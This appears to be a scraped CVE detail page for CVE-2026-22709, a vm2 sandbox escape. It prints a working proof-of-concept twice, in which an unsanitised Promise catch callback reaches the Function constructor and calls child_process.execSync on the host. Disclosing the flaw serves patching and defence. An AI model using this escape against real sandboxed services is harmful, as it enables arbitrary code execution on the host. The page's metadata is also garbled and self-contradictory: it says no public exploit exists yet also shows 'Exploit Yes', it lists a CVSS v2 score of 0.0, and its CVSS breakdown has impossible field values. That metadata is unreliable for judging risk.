What is the severity of CVE-2026-22709?

CVE-2026-22709 has a CVSS v3 score of 9.8, which is classified as Critical severity.

Is there an exploit available for CVE-2026-22709?

No known public exploits are currently available for CVE-2026-22709.

Is there a patch available for CVE-2026-22709?

Yes, patches are available for CVE-2026-22709. Check the vendor advisories for update instructions.

CVE-2026-22709 - CVE Details, Severity, and Analysis

Q: What is CVE-2026-22709?

In vm2 for version 3.10.0, `Promise.prototype.then` `Promise.prototype.catch` callback sanitization can be bypassed. This allows attackers to escape the sandbox and run arbitrary code. ```js const { VM } = require("vm2"); const code = ` const error = new Error(); error.name = Symbol(); const f = async () => error.stack; const promise = f(); promise.catch(e => { const Error = e.constructor; const Function = Error.constructor; const f = new Function( "process.mainModule.require('child_process').execSync('echo HELLO WORLD!', { stdio: 'inherit' })" ); f(); }); `; new VM().run(code); ``` In lib/setup-sandbox.js, the callback function of `localPromise.prototype.then` is sanitized, but `globalPromise.prototype.then` is not sanitized. The return value of async functions is `globalPromise` object.

Severity Scores

CVSS v39.8

CVSS v20.0

Priority Score751.0

EPSS Score0.0

Critical

Exploitation LikelihoodMinimal

0.00%EPSS

Very low probability of exploitation

Monitor and patch as resources allow

0.00%

EPSS

9.8

CVSS

Exploit

Yes

Patch

Medium Priority

critical severity

EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.

Description

In vm2 for version 3.10.0, Promise.prototype.then Promise.prototype.catch callback sanitization can be bypassed. This allows attackers to escape the sandbox and run arbitrary code.

const { VM } = require("vm2");

const code = `
const error = new Error();
error.name = Symbol();
const f = async () => error.stack;
const promise = f();
promise.catch(e => {
    const Error = e.constructor;
    const Function = Error.constructor;
    const f = new Function(
        "process.mainModule.require('child_process').execSync('echo HELLO WORLD!', { stdio: 'inherit' })"
    );
    f();
});
`;

new VM().run(code);

In lib/setup-sandbox.js, the callback function of localPromise.prototype.then is sanitized, but globalPromise.prototype.then is not sanitized. The return value of async functions is globalPromise object.

CVSS v3 Breakdown

Attack Vector:Network

Attack Complexity:Local

Privileges Required:Network

User Interaction:Network

Scope:Unchanged

Confidentiality:High

Integrity:High

Availability:High

Patch References

Github.com Github.com

Trend Analysis

Neutral

Advisories

GitHub Advisory NVD

CVE-2026-22709 - CVE Details, Severity, and Analysis | Strobes VI